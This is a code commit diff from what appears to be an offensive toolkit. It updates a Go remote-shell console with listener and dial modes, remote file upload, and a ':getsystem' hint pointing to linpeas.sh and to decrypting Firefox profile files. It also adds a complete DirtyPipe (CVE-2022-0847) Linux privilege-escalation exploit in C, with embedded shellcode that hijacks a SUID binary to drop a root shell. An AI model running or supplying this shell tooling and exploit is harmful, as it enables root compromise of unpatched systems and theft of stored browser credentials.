finish upload function

console.go

@@ -22,9 +22,9 @@ func main() {
 	fmt.Println("| |___ ___) | |__| (_) | | | \\__ \\ (_) | |  __/")
 	fmt.Println(" \\____|____/ \\____\\___/|_| |_|___/\\___/|_|\\___|")
 
-	//console()
+	console()
 	//listener("tcp", 4444)
-	dial("tcp", "127.0.0.1", 4444)
+	//dial("tcp", "127.0.0.1", 4444)
 }
 
 type env struct {
@@ -70,13 +70,13 @@ func listener(network string, port int) {
 
 	//Get username
 	conn.Write([]byte("id\n"))
-	receiver(conn)
+	receiver(*conn)
 	fmt.Print(env1.username + " > ")
 
 	go func() {
 		for {
 			<-receive
-			receiver(conn)
+			receiver(*conn)
 			fmt.Print(env1.username + " > ")
 		}
 	}()
@@ -169,7 +169,9 @@ func execInput(input string) error {
 		return nil
 
 	case "dial":
-		dial("tcp", env1.rhost, env1.rport)
+		//dial("tcp", env1.rhost, env1.rport)
+		dial("tcp", "127.0.0.1", 4444)
+		fmt.Print("dial ended")
 		return nil
 	case "exit":
 		os.Exit(0)
@@ -209,13 +211,13 @@ func dial(network string, host string, port int) {
 	receive := make(chan int)
 
 	conn.Write([]byte("id\n"))
-	receiver(conn)
+	receiver(*conn)
 	fmt.Print(env1.username + " > ")
 
 	go func() {
 		for {
 			<-receive
-			receiver(conn)
+			receiver(*conn)
 			fmt.Print(env1.username + " > ")
 		}
 	}()
@@ -247,6 +249,7 @@ func sender(conn *net.TCPConn, exit chan string, receive chan int) {
 		fmt.Println("use :upload LOCAL REMOTE to upload")
 		fmt.Println("use :exit to hung up session")
 		fmt.Println("use :getsystem to get Local Privilege Escalation")
+		fmt.Println("use :flush to flush receive buffer(Use only when input and output are inconsistent)")
 		fmt.Print(env1.username + " > ")
 		return
 	}
@@ -303,7 +306,7 @@ func sender(conn *net.TCPConn, exit chan string, receive chan int) {
 		strcount := strconv.Itoa(int(count))
 		conn.Write([]byte("dd of=" + args[2] + " status=none bs=1024 count=" + strcount + "\n"))
 		conn.Write(uploadbuf)
-		fmt.Print("Upload success")
+		fmt.Println("Upload success")
 		fmt.Print(env1.username + " > ")
 		return
 	}
@@ -316,12 +319,13 @@ func sender(conn *net.TCPConn, exit chan string, receive chan int) {
 	}
 
 	if strings.HasPrefix(inp, ":getsystem") {
-
+		fmt.Println("linpeas.sh is a priviliage escape script, please upload it and run")
+		fmt.Println("you can download files in .mozilla and then decrypt them by firefox_decrypt.py")
 		return
 	}
 
-	if strings.HasPrefix(inp, "cd") {
+	if strings.HasPrefix(inp, ":flush") {
-		conn.Write([]byte(inp))
+		receive <- 1
 		return
 	}
 	conn.Write([]byte(inp))
@@ -329,8 +333,9 @@ func sender(conn *net.TCPConn, exit chan string, receive chan int) {
 	return
 }
 
-func receiver(conn net.Conn) {
+func receiver(conn net.TCPConn) {
-	buf := make([]byte, 1024)
+	buflen := 65536
+	buf := make([]byte, buflen)
 	for {
 		n, _ := conn.Read(buf)
 
@@ -349,7 +354,9 @@ func receiver(conn net.Conn) {
 			}
 		}
 		fmt.Printf("%v", string(buf[:n]))
-		if n != 1024 {
+		if n != buflen {
+			fmt.Println(n)
+
 			return
 		}
 	}

privsec/dirtypipe.c

@@ -0,0 +1,213 @@
+// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)
+// Exploit Author: blasty (peter@haxx.in)
+// Original Author: Max Kellermann (max.kellermann@ionos.com)
+// CVE: CVE-2022-0847
+
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Copyright 2022 CM4all GmbH / IONOS SE
+ *
+ * author: Max Kellermann <max.kellermann@ionos.com>
+ *
+ * Proof-of-concept exploit for the Dirty Pipe
+ * vulnerability (CVE-2022-0847) caused by an uninitialized
+ * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
+ * file contents in the page cache, even if the file is not permitted
+ * to be written, immutable or on a read-only mount.
+ *
+ * This exploit requires Linux 5.8 or later; the code path was made
+ * reachable by commit f6dd975583bd ("pipe: merge
+ * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
+ * there before, it just provided an easy way to exploit it.
+ *
+ * There are two major limitations of this exploit: the offset cannot
+ * be on a page boundary (it needs to write one byte before the offset
+ * to add a reference to this page to the pipe), and the write cannot
+ * cross a page boundary.
+ *
+ * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
+ *
+ * Further explanation: https://dirtypipe.cm4all.com/
+ */
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+#include <stdint.h>
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+// small (linux x86_64) ELF file matroshka doll that does;
+//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
+//   write(fd, elfcode, elfcode_len)
+//   chmod("/tmp/sh", 04755)
+//   close(fd);
+//   exit(0);
+//
+// the dropped ELF simply does:
+//   setuid(0);
+//   setgid(0);
+//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
+unsigned char elfcode[] = {
+	/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+	0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
+	0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
+	0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
+	0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
+	0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
+	0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
+	0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
+	0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
+	0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
+	0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
+	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+	0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
+	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
+	0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
+	0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
+	0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
+	0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
+};
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+	if (pipe(p)) abort();
+
+	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+	static char buffer[4096];
+
+	/* fill the pipe completely; each pipe_buffer will now have
+	   the PIPE_BUF_FLAG_CAN_MERGE flag */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		write(p[1], buffer, n);
+		r -= n;
+	}
+
+	/* drain the pipe, freeing all pipe_buffer instances (but
+	   leaving the flags initialized) */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		read(p[0], buffer, n);
+		r -= n;
+	}
+
+	/* the pipe is now empty, and if somebody adds a new
+	   pipe_buffer without initializing its "flags", the buffer
+	   will be mergeable */
+}
+
+int hax(char *filename, long offset, uint8_t *data, size_t len) {
+	/* open the input file and validate the specified offset */
+	const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
+	if (fd < 0) {
+		perror("open failed");
+		return -1;
+	}
+
+	struct stat st;
+	if (fstat(fd, &st)) {
+		perror("stat failed");
+		return -1;
+	}
+
+	/* create the pipe with all flags initialized with
+	   PIPE_BUF_FLAG_CAN_MERGE */
+	int p[2];
+	prepare_pipe(p);
+
+	/* splice one byte from before the specified offset into the
+	   pipe; this will add a reference to the page cache, but
+	   since copy_page_to_iter_pipe() does not initialize the
+	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+	--offset;
+	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+	if (nbytes < 0) {
+		perror("splice failed");
+		return -1;
+	}
+	if (nbytes == 0) {
+		fprintf(stderr, "short splice\n");
+		return -1;
+	}
+
+	/* the following write will not create a new pipe_buffer, but
+	   will instead write into the page cache, because of the
+	   PIPE_BUF_FLAG_CAN_MERGE flag */
+	nbytes = write(p[1], data, len);
+	if (nbytes < 0) {
+		perror("write failed");
+		return -1;
+	}
+	if ((size_t)nbytes < len) {
+		fprintf(stderr, "short write\n");
+		return -1;
+	}
+
+	close(fd);
+
+	return 0;
+}
+
+int main(int argc, char **argv) {
+	if (argc != 2) {
+		fprintf(stderr, "Usage: %s SUID\n", argv[0]);
+		return EXIT_FAILURE;
+	}
+
+	char *path = argv[1];
+	uint8_t *data = elfcode;
+
+	int fd = open(path, O_RDONLY);
+	uint8_t *orig_bytes = malloc(sizeof(elfcode));
+	lseek(fd, 1, SEEK_SET);
+	read(fd, orig_bytes, sizeof(elfcode));
+	close(fd);
+
+	printf("[+] hijacking suid binary..\n");
+	if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
+		printf("[~] failed\n");
+		return EXIT_FAILURE;
+	}
+
+	printf("[+] dropping suid shell..\n");
+	system(path);
+
+	printf("[+] restoring suid binary..\n");
+	if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
+		printf("[~] failed\n");
+		return EXIT_FAILURE;
+	}
+
+	printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
+	system("/tmp/sh");
+
+	return EXIT_SUCCESS;
+}